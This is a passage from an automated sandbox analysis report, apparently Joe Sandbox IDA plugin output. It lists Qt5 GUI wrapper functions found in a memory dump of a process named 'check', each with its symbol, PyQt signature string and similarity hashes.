                                                                                                                                                                                                                                          • ?findBlockByLineNumber@QTextDocument@@QEBA?AVQTextBlock@@H@Z.QT5GUI ref: 00007FF89D953AE5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?findBlockBlock@@Document@@LineNumber@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$findBlockByLineNumber$findBlockByLineNumber(self, blockNumber: int) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 3998515463-2528056247
                                                                                                                                                                                                                                          • Opcode ID: 80071e95e830b6717f19d1c10cb42f43c6302023f11894d76b4295103412fc60
                                                                                                                                                                                                                                          • Instruction ID: 2f5435add89bb26e91a07efd0633cbce748b4073c194de60655fd9c94823f7d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80071e95e830b6717f19d1c10cb42f43c6302023f11894d76b4295103412fc60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11FB77A19A46C5EB10DF21E8496A933A5FB44FC0F914036DA8E47320EF3DE959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brushProperty@QTextFormat@@QEBA?AVQBrush@@H@Z.QT5GUI ref: 00007FF89D9A3EF5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?brushBrush@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$brushProperty$brushProperty(self, propertyId: int) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 2621215938-1584719044
                                                                                                                                                                                                                                          • Opcode ID: 0749edb9377bd6908af917fce7d81664574831aaae775d81e906991e8190bd69
                                                                                                                                                                                                                                          • Instruction ID: 5756f484454cc2fcc88a10c45be5e8a4b0dbbd74df329bc592131216e808e74e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0749edb9377bd6908af917fce7d81664574831aaae775d81e906991e8190bd69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B211FB37A19A46C6EB10DF25E8496A933A5FB44FC4F914032DA8E47320EF3DE559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?colorProperty@QTextFormat@@QEBA?AVQColor@@H@Z.QT5GUI ref: 00007FF89D9A3A75
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?colorColor@@Format@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$colorProperty$colorProperty(self, propertyId: int) -> QColor
                                                                                                                                                                                                                                          • API String ID: 2985419813-556251507
                                                                                                                                                                                                                                          • Opcode ID: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                                          • Instruction ID: ba2d03a90783a78aea49073fce1a7acbed04613fd046e38cbeaf34d275727f05
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c37e459ebbf1ec6c7fde5545124aceafa061cc867046ae4f76762534b2b3d287
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11E637A19A46C6EB109F25E8496A933A5FB44FC4F914032DA8E47320EF3DE959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?findBlock@QTextDocument@@QEBA?AVQTextBlock@@H@Z.QT5GUI ref: 00007FF89D949E55
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?findBlock@Block@@Document@@malloc
                                                                                                                                                                                                                                          • String ID: QTextDocument$findBlock$findBlock(self, pos: int) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 1896254834-149533175
                                                                                                                                                                                                                                          • Opcode ID: 7ea587432a48e21168dfd5b0891de4ed5eedd74afe96cc759f3e45b94cb0abd9
                                                                                                                                                                                                                                          • Instruction ID: 7f6372f6384fdf15dc0d172a940acb6d102769b15be5024f632cd61a17d22556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ea587432a48e21168dfd5b0891de4ed5eedd74afe96cc759f3e45b94cb0abd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C110D37A19A46C6EB10DF25E8496A933A5FB48FC0F914036DA8E47320EF3DE959C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?penProperty@QTextFormat@@QEBA?AVQPen@@H@Z.QT5GUI ref: 00007FF89D9A3E35
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?penFormat@@Pen@@Property@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$penProperty$penProperty(self, propertyId: int) -> QPen
                                                                                                                                                                                                                                          • API String ID: 3949166683-87781968
                                                                                                                                                                                                                                          • Opcode ID: c8296d657329e614c622bd9ed1b0a5403f7402fa91bb397124bee19a864de731
                                                                                                                                                                                                                                          • Instruction ID: 1131e70c61efa9d9346955c6aca6880923cc1324582bdd11a6a7657d737842c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8296d657329e614c622bd9ed1b0a5403f7402fa91bb397124bee19a864de731
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4110D37A19A46C6EB10DF15E8496A933A5FB44FC0F914032DA8E47320EF3DE959C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?next@QTextBlock@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D99DED8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?next@Block@@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextBlock$next$next(self) -> QTextBlock
                                                                                                                                                                                                                                          • API String ID: 808233332-3118153420
                                                                                                                                                                                                                                          • Opcode ID: 10f093acd2bf5e27997c62c6261b18a9c6878dd62ab29fbf4f31a77442d88ba0
                                                                                                                                                                                                                                          • Instruction ID: 84dc374db895f77e41cbf6b6777ded32f527e882bef729ee11f8361aa3e7b96d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f093acd2bf5e27997c62c6261b18a9c6878dd62ab29fbf4f31a77442d88ba0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50110977A09A4695EB109F65E8496A937A4FB44FD0F918032C98E07320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?adjoint@QTransform@@QEBA?AV1@XZ.QT5GUI ref: 00007FF89D94BAD8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?adjoint@Transform@@malloc
                                                                                                                                                                                                                                          • String ID: QTransform$adjoint$adjoint(self) -> QTransform
                                                                                                                                                                                                                                          • API String ID: 1382169850-3274404985
                                                                                                                                                                                                                                          • Opcode ID: 1df194f377685806da0020952fbcac32e83973beafc58f15b43cb8874f2c94c3
                                                                                                                                                                                                                                          • Instruction ID: 38c4071520ec8b2c1183ebeb7dc4b2d0f6d2f1389f12200622abf1927710725f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df194f377685806da0020952fbcac32e83973beafc58f15b43cb8874f2c94c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A113937A08A86C1EB109F25E8496A933E4FB44FD4F918032DA8E07720EF7CE959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?requestedFormat@QWindow@@QEBA?AVQSurfaceFormat@@XZ.QT5GUI ref: 00007FF89D95DEE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?requestedFormat@Format@@SurfaceWindow@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$requestedFormat$requestedFormat(self) -> QSurfaceFormat
                                                                                                                                                                                                                                          • API String ID: 3683396542-1982314141
                                                                                                                                                                                                                                          • Opcode ID: a2047704e4ac0fa1665ac9f1753bebbae1b10dd7b7cd451892560f665a93fd90
                                                                                                                                                                                                                                          • Instruction ID: a6cd9d5199885e9be5174076a4ec27ac531ba6a2b8698e130a90f9cfe509bc04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2047704e4ac0fa1665ac9f1753bebbae1b10dd7b7cd451892560f665a93fd90
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC110577A08A46C2EB109F65E8896A933A4FB44FD4F918032DA9E07324EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?creator@QPdfWriter@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FF89D983EE8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?creator@String@@Writer@@malloc
                                                                                                                                                                                                                                          • String ID: QPdfWriter$creator$creator(self) -> str
                                                                                                                                                                                                                                          • API String ID: 2678230333-1028462170
                                                                                                                                                                                                                                          • Opcode ID: dd94886dfbcd19c62edb04a51217b5ffd298c5dacebf08897f8c82cadd198b2e
                                                                                                                                                                                                                                          • Instruction ID: 0bf84c78734027bb0633782720e96bec964f8950c36bb117dda17f7ee62a9096
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd94886dfbcd19c62edb04a51217b5ffd298c5dacebf08897f8c82cadd198b2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A113977A08A4682EB109F65E84A6A933A4FB44FD0F918032DA8E47320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?format@QTextInlineObject@@QEBA?AVQTextFormat@@XZ.QT5GUI ref: 00007FF89D95BF38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?format@Format@@InlineObject@@malloc
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$format$format(self) -> QTextFormat
                                                                                                                                                                                                                                          • API String ID: 2931889132-2854710909
                                                                                                                                                                                                                                          • Opcode ID: 7eda8cf6d3043e79bb2220248acb1dcaff28ab64cbcca2d73981cb2438d7d93b
                                                                                                                                                                                                                                          • Instruction ID: 05f4e722221e452714bb403ea0f05e98d651d027f2ca75c0aea650ece6f2c0ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eda8cf6d3043e79bb2220248acb1dcaff28ab64cbcca2d73981cb2438d7d93b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02113577A08A46C1EB209F21E84A6A933A4FB44FD0F918032DA9E07320EF7DF559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?cursor@QWindow@@QEBA?AVQCursor@@XZ.QT5GUI ref: 00007FF89D96BF48
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?cursor@Cursor@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$cursor$cursor(self) -> QCursor
                                                                                                                                                                                                                                          • API String ID: 2860300759-1668880385
                                                                                                                                                                                                                                          • Opcode ID: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                                          • Instruction ID: 71d5ef4fde247a294ec249a67f6defa92040bc15791ca946909d790437b88f43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B110977A08A4681EB109F65E8496A933A4FB44FD4F918032D99E07320EF7CF559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toVector4D@QVector2D@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FF89D999B18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Vector4$Vector2malloc
                                                                                                                                                                                                                                          • String ID: QVector2D$toVector4D$toVector4D(self) -> QVector4D
                                                                                                                                                                                                                                          • API String ID: 311956697-3690013905
                                                                                                                                                                                                                                          • Opcode ID: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                                          • Instruction ID: 11559165276ce97c929e3c6fcab93644484a441bc32f08259508103183533ae7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1112777A08A46C1EB109F61E84A6A933E4FB44FD4F918032CA8E47320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?boundingRect@QTextLayout@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D955F18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boundingLayout@@RectRect@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextLayout$boundingRect$boundingRect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 620106861-2289836743
                                                                                                                                                                                                                                          • Opcode ID: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                                          • Instruction ID: 8902a82e4d6e638211ca9c599311313b37e83b6651e829f6d9e26e9fcbcc1b5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B110577A09A46C1EB109F65E8496A933A4FB44FD0F918032DA9E47320EF7CF559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?discardCommand@QSessionManager@@QEBA?AVQStringList@@XZ.QT5GUI ref: 00007FF89D963F18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?discardCommand@List@@Manager@@SessionStringmalloc
                                                                                                                                                                                                                                          • String ID: QSessionManager$discardCommand$discardCommand(self) -> List[str]
                                                                                                                                                                                                                                          • API String ID: 1524762267-3557297886
                                                                                                                                                                                                                                          • Opcode ID: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                                          • Instruction ID: 23ff79764c2678dd9e9b197ce4dc7254e4d143515bdcf4ed5ba2749c29bab7e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE11F777A09A8681EB10DF65E88A6A933A4FB44FD0F914032DA8E47320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ.QT5GUI ref: 00007FF89D977F28
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?windowFlags@Qt@@@@State@States@WindowWindow@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$windowStates$windowStates(self) -> Qt.WindowStates
                                                                                                                                                                                                                                          • API String ID: 1775758369-1511991782
                                                                                                                                                                                                                                          • Opcode ID: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                                          • Instruction ID: 597f5cec6be6508e64f527ced8180fc35ab096f1a8e25aa7d7b2698ea78bafa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113977A08A46C6EB109F21E8496A933A4FB44FD0F914032CA8E07320EF7CE559C348
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?font@QPaintEngineState@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FF89D9B7E88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?font@EngineFont@@PaintState@@malloc
                                                                                                                                                                                                                                          • String ID: QPaintEngineState$font$font(self) -> QFont
                                                                                                                                                                                                                                          • API String ID: 746269019-3572444425
                                                                                                                                                                                                                                          • Opcode ID: 6b47000e48d53edac6b1509c2b147baff5b29d784d052b693a2462b825267cc1
                                                                                                                                                                                                                                          • Instruction ID: 62e079241875ce786554eb3ad39b78d851ec438e05b30fe7b1d00fde77d8810c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b47000e48d53edac6b1509c2b147baff5b29d784d052b693a2462b825267cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28110977A09A4681EB10DF65E8496A933A4FF88FD4F918032DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?takeVerticalHeaderItem@QStandardItemModel@@QEAAPEAVQStandardItem@@H@Z.QT5GUI ref: 00007FF89D955A87
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?takeHeaderItemItem@Item@@Model@@Vertical
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$takeVerticalHeaderItem$takeVerticalHeaderItem(self, row: int) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 3666662607-150036698
                                                                                                                                                                                                                                          • Opcode ID: cdaed4e039946b14e5c7ff13ad6937159044d2227ceb6a367378d7569afd5bbe
                                                                                                                                                                                                                                          • Instruction ID: a672be059036d45fb063903ffff4a1504770ea79a3b29083f959c9cbb28c397a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdaed4e039946b14e5c7ff13ad6937159044d2227ceb6a367378d7569afd5bbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4811F536A19E46C6EB10DF11E8896A933A5FB44FD4F918032DA8E43320EF39E959C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?frameMargins@QWindow@@QEBA?AVQMargins@@XZ.QT5GUI ref: 00007FF89D965E58
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?frameMargins@Margins@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$frameMargins$frameMargins(self) -> QMargins
                                                                                                                                                                                                                                          • API String ID: 1734882684-3586196236
                                                                                                                                                                                                                                          • Opcode ID: 769789fdcdfacb6b60557f3c9e15e230b8b9f4a9ce0cfa07370cb31abae4c5ea
                                                                                                                                                                                                                                          • Instruction ID: a2ef9a90649ae01f44b8c728186456069447ecef686acf77bec5e90b9bcbccf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769789fdcdfacb6b60557f3c9e15e230b8b9f4a9ce0cfa07370cb31abae4c5ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711F777A08A46C2EB10DF65E8896A933A4FB44FD4F914032D99E07320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?alignment@QTextTableFormat@@QEBA?AV?$QFlags@W4AlignmentFlag@Qt@@@@XZ.QT5GUI ref: 00007FF89D969E58
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?alignment@AlignmentFlag@Flags@Format@@Qt@@@@TableTextmalloc
